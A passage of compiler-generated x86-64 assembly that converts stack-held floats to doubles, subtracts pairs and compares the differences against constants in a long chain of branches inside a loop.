movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_18(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_351
jp LBB1_351
jmp LBB1_355
LBB1_351: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_352
jp LBB1_352
jmp LBB1_355
LBB1_352: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_353
jp LBB1_353
jmp LBB1_355
LBB1_353: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_354
jp LBB1_354
jmp LBB1_355
LBB1_354: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_355: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.356: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.357: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.358: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.359: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.360: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.361: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.362: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.363: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.364: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -44(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.365: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_366
jp LBB1_366
jmp LBB1_375
LBB1_366: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_367
jp LBB1_367
jmp LBB1_375
LBB1_367: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_368
jp LBB1_368
jmp LBB1_375
LBB1_368: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_369
jp LBB1_369
jmp LBB1_375
LBB1_369: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_370
jp LBB1_370
jmp LBB1_375
LBB1_370: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_371
jp LBB1_371
jmp LBB1_375
LBB1_371: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_372
jp LBB1_372
jmp LBB1_375
LBB1_372: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_373
jp LBB1_373
jmp LBB1_375
LBB1_373: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_374
jp LBB1_374
jmp LBB1_375
LBB1_374: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -44(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_375: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.376: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.377: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.378: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.379: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.380: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.381: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.382: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.383: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.384: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -188(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.385: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_386
jp LBB1_386
jmp LBB1_395
LBB1_386: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_387
jp LBB1_387
jmp LBB1_395
LBB1_387: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_388
jp LBB1_388
jmp LBB1_395
LBB1_388: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_389
jp LBB1_389
jmp LBB1_395
LBB1_389: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_390
jp LBB1_390
jmp LBB1_395
LBB1_390: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_391
jp LBB1_391
jmp LBB1_395
LBB1_391: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_392
jp LBB1_392
jmp LBB1_395
LBB1_392: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_393
jp LBB1_393
jmp LBB1_395
LBB1_393: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_394
jp LBB1_394
jmp LBB1_395
LBB1_394: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -188(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_395: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.396: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.397: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.398: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.399: ## in Loop: Header=BB1_8 Depth=1
movss -144(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.400: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.401: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.402: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_5(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.403: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.404: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -180(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.405: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_406
jp LBB1_406
jmp LBB1_415
LBB1_406: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_407
jp LBB1_407
jmp LBB1_415
LBB1_407: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -180(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_408
jp LBB1_408
jmp LBB1_415
LBB1_408: ## in Loop: Header=BB1_8 Depth=1
